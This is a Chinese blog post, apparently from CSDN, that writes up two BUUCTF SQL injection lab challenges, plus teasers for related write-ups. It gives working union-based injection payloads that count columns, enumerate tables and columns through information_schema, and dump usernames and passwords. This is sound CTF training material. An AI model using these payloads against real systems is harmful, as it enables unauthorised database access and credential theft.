BUUCTF web类基础 SQL篇

最新推荐文章于 2023-10-19 15:54:10 发布
最新推荐文章于 2023-10-19 15:54:10 发布
阅读量192 收藏
点赞数 1
文章标签: 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_60399102/article/details/132700495
版权

1,[极客大挑战 2019]EasySQL

打开靶场,来到登录界面,随便输入登录用户名与密码,看到链接直接显示出提交的表单内容

这时候可以考虑构造闭合来绕过数据库的检测,尝试使用万能密码测试登陆到后台。

看到报错内容,修改几次,使其闭合,登陆到后台。刚开始使用“--”来注释,发现被过滤了。

使用#来注释,成功绕过。

2,[极客大挑战 2019]LoveSQL

又是一样的登陆界面,万能密码一试,来到后台,但是flag不在那里了,这时候猜测应该在数据库的某个字段里。

既然万能密码可以用,那就以其作为闭合,来检测,先order by看一下有几个字段。可见到4的时候查询不到,字段数为3。

1' order by 4#

接下来判断字段显现位置,使用联合查询,可查看字段显现位置。

1' union select 1,2,3#

找到字段显现位置,我们在2,3位置插入sql语句即可。来爆一下数据库名,得到名字为geek

1' union select 1,database(),3#

爆一下表名,得到两个表(第一个sql语句显示语法错误,有人知道为什么吗?)

1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database(),3#
1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#

看列名

1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name="geekuser"#
1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name="l0ve1ysq1"#

两个表下列名都一样,一个一个看就是喽。在第二个表中发现flag,由于字段太多,看页面源代码更清楚。

1' union select 1,2,group_concat(id,username,password) from geekuser#
1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1#

题外话,如果当前数据库下没有需要的数据,可以通过这段sql语句来查询其他库。

1' union select 1,2,(select group_concat(schema_name) from information_schema.schemata)#

mysql,performance_schema,test,geek

感叹

真是一时不练就手生,sql语句错误百出,好在两题过后渐渐有了感觉,SQL注入当初学的还行,这段时间继续更新。

觉策
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
BUUCTF 2
qq_52431855的博客
01-15 164
知识点: SQL堆叠注入:在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。 show 在过滤了 select 和 where 的情况下,还可以使用 show 来爆出数据库名,表名,和列名。 show datebases; //数据库。 show tables; //表名。 show columns from table; //字段。 alert 作用:修改已知表的列。( 添加:ad
SQL注入(buuctf web入门sql注入2)
weixin_44214568的博客
07-13 1903
1.启动靶机: 2.进入login.php界面 ps:界面没有注入口,因为这个题目是sql注入,尝试输入常规的login界面,进入了login界面 我们学习ctf,在基础阶段还是要抛开脑洞,掌握并且形成一套破解模式 3.查看源代码 这个源代码里面有用的信息就是?tips=1,但是加到url后面也没什么效果 4.抓包吧 尝试了一下普通的注入没有啥用 5.先用burpsuit查看数据库 注入语句 1' and updatexml(1,concat(0x7e,(select data
BUUCTF [第一章 web入门]SQL注入-2
qq_45707441的博客
12-22 2531
经分析后可知:当输入admin’ and 1=3# 时返回为假 {“error”:1,“msg”:"\u8d26\u53f7\u4e0d\u5b58\u5728"} 当输入admin’ and 1=1# 时返回为真{“error”:1,“msg”:"\u8d26\u53f7\u6216\u5bc6\u7801\u9519\u8bef"} 根据返回的字符串,我们可以写出解决的python脚本 #数据库名字长度 import string import requests url="http://e2cc3e..
[BUUCTF][N1BOOK][第一章 web入门]SQL注入-2(详细解析)
weixin_66146598的博客
06-09 4989
[BUUCTF][N1BOOK][第一章 web入门]SQL注入-2(详细解析),《从0到1:CTFer成长之路》书籍配套题目之sql注入。1、有的网站会开启错误调试信息方便开发者调试,可以利用报错信息进行报错注入2、updatexml第二个参数应为合法XPATH路径,否则会在引发报错的同时输出传入的参数3、dual用于测试数据库是否可以正常使用4、如果没有报错提示,可以bool注入...
CTF刷题记录Buuctf-N1BOOK-sql2
m_de_g的博客
06-09 1177
N1BOOK-SQL2 一、解题思路 直接访问,会出现403,难受,再看一下提示:请访问/login.php /user.php http://7496c5f0-0623-4702-951f-b085e8f8cb97.node3.buuoj.cn/user.php http://7496c5f0-0623-4702-951f-b085e8f8cb97.node3.buuoj.cn/login.php 1.养成好习惯,Ctrl + U 查看页面源代码 2.看到提示,那直接按照提示,走一波 3..
BUUCTF - Web -[web入门]sql 1~2(水题勿览)
1tachi的博客
12-01 1725
《CTFer:从0到1》的两道sql注入(水题勿览) 看到提示,得到闭合方式:' 查字段数 order by 3正常回显,order by 4无回显,三个字段 判断回显点 回显点是2、3 注意:当id=3的时候会正常回显,这时会覆盖掉我们查询的数据,所以id=3.1,使正常内容不会显,我们就看到了我们所查询的数据 查表名 ?id=3.1' union select 1,table_name,3 from information
Oracle数据库培训SQL基础.ppt
11-12
Oracle数据库培训SQL基础.ppt
WEB安全基础-合集
10-23
WEB安全基础—合集,包含基础SQL注入、文件上传、XSS、CSRF、文件包含、逻辑漏洞等。适合新手上手参考学习,通过本文档,可以快速了解渗透测试。
Web安全之SQL注入攻击
03-04
①这个晨讲我构思了两个星期,但是之前电脑坏了,一直拖...今天由我给大家带来《web安全之SQL注入》系列晨讲,首先对课程进行简单介绍,SQL注入一共分为三讲:第一讲:“纸上谈兵:我们需要在本地架设注入环境,构
常用web开发工具 SQL数据库文件.zip
06-30
常用web开发工具 SQL数据库文件.zip常用web开发工具 SQL数据库文件.zip常用web开发工具 SQL数据库文件.zip常用web开发工具 SQL数据库文件.zip常用web开发工具 SQL数据库文件.zip常用web开发工具 SQL数据库文件.zip...
BUUCTF SQL注入大合集
fly夏天的博客
06-02 2711
SQL水平太菜了,因此专门复现一轮SQL注入再学习一下。 1.强网杯2019随便注 尝试 1 'and '1'='1 成功回显,存在注入点。 但是题目有很强的过滤。 考虑堆叠注入。 由于没有过滤show函数因此可以用其来进行查询一些数据库信息。常见的有 show databases //查询数据库名称 show tables / show tables from db_name //查询(指定数据库)表名 show engines...
buu(sql注入)
qq_62046696的博客
08-23 1208
打开界面,我们发现是 admin账号还是monster,这道题肯定与cookie有关,直接在cookie中。列数不对,or也被过滤,大小写,双写都不能绕过,呃呃呃,这样order,information都被过滤了。回显位置,2,3现在我们需要找一个命令替换掉,information.schema_tables,这应该是注入点的位置, 发现# --+被过滤,然后是上传发现,没空格,那就有/**/代替空格。啥都没有,考察cookie用admin登录,都不需要密码,感觉挺离谱的,直接出来试一下monster,..
BUU SQL COURSE 1
CyhDl666的博客
03-12 3354
进入题目给了两个页面 一开始以为在注入点在登录页面 尝试了万能密码 和 各种闭合 没发现注入的方式 接着尝试了热点列表页面的注入 但是url上好像不存在注入 F12在net中找到了隐藏的url 访问content_detail.php?id=1页面构造payload ?id=0 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()# # admin、co.
[Writeup]BUU SQL COURSE1[入门级]
小飒的博客
06-08 650
观察网址,好像找到注入点 获得数据库 ctftraining获得表名 FLAG_TABLE获得列名 FLAG_COLUMN获得数据时发现数据是空的,只能想另外办法 看能不能登录news的数据库下找到 admin的密码:67fef29ef7beb75f567587f135fa26a0 获得flag payload: 使用sqlmap burp里直接可以找到注入点...
Buuctf | BUU SQL COURSE 1
m_de_g的博客
12-27 6223
BUU SQL COURSE 1 一、题目下载 https://buuoj.cn/challenges#BUU%20SQL%20COURSE%201 二、实战化演练 1.直接使用弱口令来进行测试 2.经过多次的测试,都无法注入,说明这个是写死的注册和登录,左边不是有热点吗?查看了一下跳转 3.通过访问backend/content_detail.php?id=1 4.通过修改后面的id=1,2,3,均会返回信息,直接使用SQL查询语句 1 and 1=1 5.我们尝试使用 1 and 1=2
BUUCTF记录-Basic
繁华若有光的博客
11-16 4384
本机环境:Windows10 一、Linux Labs 1 题目提示: ssh 用户名:root 密码:123456 地址和端口为动态分配的。 解题思路: 1. 打开cmd控制台,ssh连接靶机,然后输入密码 ssh -p 25836 root@node4.buuoj.cn 2.现在位于用户目录~,cd切换至根目录/,查看根目录下所有文件,发现flag.txt,查看文件内容 二、BUU LFI Course1 题目提示: LFI:本地文件包含 解题思路: 本关考察本地文件包含.
SQLi-LABS 1-22关(Basic Challenges) 手动注入--(缓慢更新中 12/22)
燕麦葡萄干的博客
11-18 3484
首先判断注入型,分别使用?时间注入是利用sleep()或benchmark()等函数让MySQL的执行时间变长,时间盲注多与if(expr1,expr2,expr3)结合使用,此if语句意思为:如果expr1是TRUE,则if()的返回值是expr2;进入到MySQL所在目录,我这里是D:\software\phpstudy_pro\Extensions\MySQL5.7.26\bin,目录栏直接输入cmd调出cmd终端,输入mysql -u root -p ,然后输入密码即可成功登陆数据库。
CTF Web SQL注入专项整理(持续更新中)
m0_73734159的博客
10-19 2899
SQL注入专项整理
buuctf web easy sql
最新发布
12-18
根据提供的引用内容,buuctf web easy sql 是一个关于SQL注入的题目。根据引用[1],给出的SQL语句是一个拼接字符串的方式,其中包含了一个注入点。而引用中提到的sql_mode中的PIPES_AS_CONCAT选项将 || 视为字符串的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值